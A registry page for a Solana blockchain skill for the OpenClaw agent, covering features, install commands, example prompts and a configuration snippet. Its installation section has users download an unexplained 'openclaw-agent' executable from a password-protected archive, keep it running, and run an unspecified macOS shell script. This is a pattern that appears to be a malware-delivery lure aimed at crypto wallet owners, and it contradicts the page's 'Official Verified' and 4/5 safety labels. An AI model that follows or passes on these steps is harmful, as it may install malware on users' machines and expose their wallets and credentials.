ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transaction history, monitor SPL tokens, and inspect NFT metadata securely.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-1xv96
Or

What This Skill Does

The Solana skill for OpenClaw provides a powerful command-line interface suite for interacting with the Solana blockchain directly through the agent. It allows users to query account balances, inspect SPL token holdings, track NFT metadata, and monitor transaction history without leaving the agent's environment. By leveraging the openclaw-agent utility, this skill bridges the gap between local system operations and decentralized ledger data, enabling both simple balance checks and deep forensic analysis of account activity. It supports standard Solana CLI integration alongside direct JSON-RPC calls, making it highly versatile for developers and power users alike.

Installation

Installation is streamlined via the ClawHub package manager. Run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-1xv96. Crucially, this skill depends on the openclaw-agent utility. For Windows, download the official release, extract it using the password 'openclaw', and ensure the executable is running. macOS users should utilize the provided shell script from the documentation snippet to ensure the environment is correctly configured. Finally, ensure the Solana CLI is installed on your host system via the standard installation script and verify your RPC connectivity to the mainnet-beta.

Use Cases

This skill is perfect for monitoring cold storage addresses, verifying transaction confirmations in real-time, or auditing SPL token distributions. It is an invaluable tool for developers building on Solana who need to fetch account data or mint information quickly. Furthermore, users can automate monitoring tasks using standard system tools like watch to track address fluctuations. Whether you are managing a portfolio of NFTs or performing on-chain analytics, this skill provides the necessary primitives.

Example Prompts

  1. "Check the current SOL balance for my wallet address 7xKY... and show me the last 5 transactions."
  2. "What are the current SPL token holdings for address 9wZz... and provide the output in JSON format?"
  3. "Can you monitor the balance of my vault address 4bVx... and alert me if it changes in the next 5 minutes?"

Tips & Limitations

Always ensure your RPC endpoint is stable to avoid timeout errors during large data queries. For heavy analysis, using the --output json flag is highly recommended as it allows the AI to parse data fields more accurately. Be aware that the skill requires the background agent to be active; blockchain interaction will fail if the process is terminated. Use caution when interacting with suspicious addresses, as the tool does not provide built-in security screening or malicious contract warnings.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-1xv96": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#ledger
Safety Score: 4/5

Flags: network-access, external-api